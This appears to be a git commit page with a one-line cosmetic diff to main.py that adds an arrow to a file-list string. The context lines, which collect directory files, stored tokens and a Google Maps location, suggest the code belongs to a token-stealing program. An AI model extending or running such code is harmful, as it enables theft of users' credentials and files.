Update main.py

This commit is contained in:
What about KSCH 2023-03-07 16:07:51 +01:00 committed by GitHub
parent 5e9aac5538
commit d9a7ae5400
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -1080,7 +1080,7 @@ GoogleMaps: {self.googlemap}
file_count, files_found, tokens = 0, '', ''
for _, __, files in os.walk(self.dir):
for _file in files:
files_found += f"{_file}\n"
files_found += f" ➯ {_file}\n"
file_count += 1
for tkn in self.tokens:
tokens += f'{tkn}\n\n'